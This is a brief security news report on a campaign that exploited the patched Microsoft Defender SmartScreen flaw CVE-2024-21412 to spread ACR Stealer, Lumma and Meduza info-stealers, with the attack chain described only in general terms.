24 July 2024

Microsoft Defender SmartScreen bug exploited to spread info-stealers


Microsoft Defender SmartScreen bug exploited to spread info-stealers

A recently patched security vulnerability in Microsoft Defender SmartScreen has been actively exploited in a sophisticated campaign designed to deliver a range of information stealers, including ACR Stealer, Lumma, and Meduza.

The campaign, observed by FortiGuard Labs, leverages the flaw (CVE-2024-21412) to download malicious executable files. This is a security restrictions bypass issue that allows attackers to bypass SmartScreen protection and deliver malicious payloads. Microsoft addressed this vulnerability in its February 2024 monthly security updates.

The attackers initiate the process by enticing victims to click on a crafted link to a URL file, which then downloads an LNK file. This LNK file subsequently downloads an executable containing an HTML Application (HTA) script.

Once executed, the script decodes and decrypts PowerShell code to fetch the final URLs, decoy PDF files, and a malicious shellcode injector. The final stealer is then injected into legitimate processes, initiating malicious activities and sending the stolen data to a command-and-control (C2) server.

FortiGuard Labs has detected this campaign targeting users in North America, Spain, and Thailand. The threat actors have developed different injectors to evade detection and utilize various PDF files to specifically target these regions, the company said.

Back to the list

Latest Posts

Global police op shuts down major DDoS platforms

Global police op shuts down major DDoS platforms

As part of the effort, three suspected administrators were arrested in France and Germany.
11 December 2024
US authorities charge Chinese hacker for exploiting zero-day bug in Sophos firewalls

US authorities charge Chinese hacker for exploiting zero-day bug in Sophos firewalls

The US Department of State offered a reward of up to $10 million for information leading to the hacker's capture.
11 December 2024
Microsoft’s December 2024 Patch Tuesday fixes over 70 flaws, one actively exploited

Microsoft’s December 2024 Patch Tuesday fixes over 70 flaws, one actively exploited

0Day affects the CLFS Driver and can be abused by a local user for code execution with SYSTEM privileges.
11 December 2024